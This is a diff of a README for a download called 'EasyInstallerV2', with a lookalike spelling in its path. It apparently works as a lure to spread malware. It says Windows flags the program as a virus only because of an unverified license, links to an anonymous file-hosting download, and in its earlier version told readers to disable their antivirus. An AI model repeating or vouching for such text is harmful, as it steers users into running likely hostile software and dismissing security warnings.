simplybk/EasylnstallerV2/README.md

 # EasyInstallerV2

-## Make Sure, to disable your antivirus. ( Windows flags as a Virus because the owner does NOT have a verified license.
+## ( Windows flags as a Virus because the owner does NOT have a verified license.

 ## Download [here](https://gofile.io/d/64fA10)!